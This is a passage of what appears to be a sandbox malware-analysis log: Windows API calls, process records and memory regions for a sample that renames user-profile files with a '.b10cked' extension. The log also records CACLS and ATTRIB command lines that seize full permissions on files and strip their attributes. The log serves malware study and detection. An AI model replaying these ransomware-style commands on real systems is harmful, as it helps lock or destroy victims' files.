lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.759] GetConsoleOutputCP () returned 0x1b5 [0215.759] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.759] GetUserDefaultLCID () returned 0x409 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf658, cchData=128 | out: lpLCData="0") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf658, cchData=128 | out: lpLCData="0") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf658, cchData=128 | out: lpLCData="1") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.760] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.761] GetConsoleTitleW (in: lpConsoleTitle=0x3c08b0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.761] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.761] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.761] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.762] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.762] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.762] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.762] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.762] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.762] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.762] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.765] GetConsoleTitleW (in: lpConsoleTitle=0x1cf350, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.765] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.765] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.765] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.765] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.765] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.765] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.765] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.765] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.765] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.765] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0215.765] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.765] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.765] _wcsicmp 
(_String1="move", _String2="PROMPT") returned -3 [0215.765] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.765] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.765] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.765] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.765] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.766] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.766] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.766] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.766] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.766] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.766] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.766] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.766] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.766] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.766] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.766] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.766] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.766] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.766] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf10c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf104, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf104*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", 
_MaxCount=0x7) returned 38 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 
[0215.769] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.769] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.769] _wcsicmp (_String1="NTUSER~1.LOG", _String2=".") returned 64 [0215.769] _wcsicmp (_String1="NTUSER~1.LOG", _String2="..") returned 64 [0215.769] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER~1.LOG" (normalized: "c:\\users\\default\\ntuser~1.log")) returned 0x22 [0215.770] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1d18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.770] SetErrorMode (uMode=0x0) returned 0x0 [0215.770] SetErrorMode (uMode=0x1) returned 0x0 [0215.770] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", nBufferLength=0x104, lpBuffer=0x1cea94, lpFilePart=0x1cea7c | out: lpBuffer="C:\\Users\\Default\\NTUSER~1.LOG", lpFilePart=0x1cea7c*="NTUSER~1.LOG") returned 0x1d [0215.770] SetErrorMode (uMode=0x0) returned 0x1 [0215.770] GetFileAttributesW (lpFileName="C:\\Users\\Default" (normalized: "c:\\users\\default")) returned 0x13 [0215.770] _wcsicmp (_String1="NTUSER~1.LOG", _String2=".") returned 64 [0215.770] _wcsicmp (_String1="NTUSER~1.LOG", _String2="..") returned 64 [0215.770] GetFileAttributesW 
(lpFileName="C:\\Users\\Default\\NTUSER~1.LOG" (normalized: "c:\\users\\default\\ntuser~1.log")) returned 0x22 [0215.770] SetErrorMode (uMode=0x0) returned 0x0 [0215.770] SetErrorMode (uMode=0x1) returned 0x0 [0215.770] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", nBufferLength=0x104, lpBuffer=0x1cef10, lpFilePart=0x1ceca8 | out: lpBuffer="C:\\Users\\Default\\NTUSER~1.LOG", lpFilePart=0x1ceca8*="NTUSER~1.LOG") returned 0x1d [0215.770] SetErrorMode (uMode=0x0) returned 0x1 [0215.771] SetErrorMode (uMode=0x0) returned 0x0 [0215.771] SetErrorMode (uMode=0x1) returned 0x0 [0215.771] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked", nBufferLength=0x104, lpBuffer=0x1cf118, lpFilePart=0x1ceca8 | out: lpBuffer="C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked", lpFilePart=0x1ceca8*="NTUSER.DAT.LOG1.b10cked") returned 0x28 [0215.771] SetErrorMode (uMode=0x0) returned 0x1 [0215.771] SetLastError (dwErrCode=0x0) [0215.771] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked" (normalized: "c:\\users\\default\\ntuser.dat.log1.b10cked")) returned 0xffffffff [0215.771] GetLastError () returned 0x2 [0215.771] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x1ce624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce624) returned 0x3d2188 [0215.771] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x1ce624 | out: lpFindFileData=0x1ce624) returned 0 [0215.772] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.772] GetLastError () returned 0x12 [0215.772] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x1ce624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce624) returned 0x3d2188 [0215.772] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x1ce624 | out: lpFindFileData=0x1ce624) returned 0 
[0215.772] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.772] GetLastError () returned 0x12 [0215.816] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x3d1ab8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1ab8) returned 0x3d2188 [0215.816] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x3d1ab8 | out: lpFindFileData=0x3d1ab8) returned 0 [0215.816] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.816] GetLastError () returned 0x12 [0215.816] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NTUSER~1.LOG", fInfoLevelId=0x1, lpFindFileData=0x3d1ab8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1ab8) returned 0x3d2188 [0215.816] FindNextFileW (in: hFindFile=0x3d2188, lpFindFileData=0x3d1ab8 | out: lpFindFileData=0x3d1ab8) returned 0 [0215.816] FindClose (in: hFindFile=0x3d2188 | out: hFindFile=0x3d2188) returned 1 [0215.816] GetLastError () returned 0x12 [0215.816] _get_osfhandle (_FileHandle=2) returned 0xb [0215.816] GetFileType (hFile=0xb) returned 0x2 [0215.817] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0215.817] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ce7f4 | out: lpMode=0x1ce7f4) returned 1 [0215.817] _get_osfhandle (_FileHandle=2) returned 0xb [0215.817] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ce828 | out: lpConsoleScreenBufferInfo=0x1ce828) returned 1 [0215.817] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0215.818] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce868 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c 
[0215.819] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1ce84c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce84c*=0x2c) returned 1 [0215.819] longjmp () [0215.819] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.819] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.819] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.819] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.819] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.819] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.820] SetConsoleInputExeNameW () returned 0x1 [0215.820] GetConsoleOutputCP () returned 0x1b5 [0215.820] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.820] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.820] exit (_Code=1) Process: id = "544" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16cc0" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "542" os_parent_pid = "0xb28" cmd_line = "CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32049 start_va = 0x30000 end_va = 0x33fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32051 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32052 start_va = 0xab0000 end_va = 0xab8fff entry_point = 0xab0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 32053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32056 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 32057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32058 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32059 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32060 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id 
= 32061 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32062 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 32063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32064 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32066 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32067 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32068 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32069 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 745 os_tid = 0xc20 Thread: id = 746 os_tid = 0xffc Process: id = "545" 
image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16cc0" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "542" os_parent_pid = "0xb28" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32070 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32071 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32072 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32073 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32074 start_va = 0x660000 end_va = 0x666fff entry_point = 0x660000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32075 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32076 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32077 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32078 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32079 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32080 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32081 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32082 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32083 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32084 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32085 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32086 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32087 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 
"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32088 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32089 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32090 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32091 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32092 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32093 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32094 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32095 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32096 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32097 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 32098 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32099 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 747 os_tid = 0xb3c Process: id = "546" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT 